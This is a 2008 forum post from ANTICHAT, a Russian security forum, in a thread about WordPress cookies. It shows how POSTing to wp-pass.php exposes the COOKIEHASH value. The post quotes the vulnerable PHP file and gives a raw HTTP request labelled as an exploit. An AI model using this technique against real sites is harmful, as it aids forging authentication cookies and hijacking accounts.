Форум АНТИЧАТ - WordPress Cookies

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#10

24.01.2008, 06:17

~~Elekt~~

Banned

Регистрация: 05.12.2005

Сообщений: 982

Провел на форуме:
4839935

Репутация: 1202

Отправить сообщение для Elekt с помощью ICQ

Дополнение.

Раскрытие COOKIEHASH.

Необязательно вообще добывать siteurl, кодировать его в мд5 и проверять.

Достаточно послать пост-пакет на wp-pass.php
В ответе вам вернется валидный COOKIEHASH кукиса.

wp-pass.php

PHP код:


		
			
<?php

require( dirname(__FILE__) . '/wp-config.php');



if ( get_magic_quotes_gpc() )

    $_POST['post_password'] = stripslashes($_POST['post_password']);



// 10 days

setcookie('wp-postpass_' . COOKIEHASH, $_POST['post_password'], time() + 864000, COOKIEPATH);



wp_safe_redirect(wp_get_referer());

?>

Эксплоит:

Код:

POST /wordpress/wp-pass.php HTTP/1.0
Host: localhost
Content-Length: 20

post_password=test

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

Прокси: Как вас вычислить если вы под анонимным прокси

Geveres

Статьи

19.11.2005 17:02

как стащить cookies

bous

E-Mail

06.10.2005 20:32

Модификация Cookies

Hquak

Болталка

06.07.2005 18:48

SQL-injection и не только, через cookies

k00p3r

Чужие Статьи

12.06.2005 12:46

Вопрос по Cookies.

Nice

Уязвимости

10.04.2005 19:31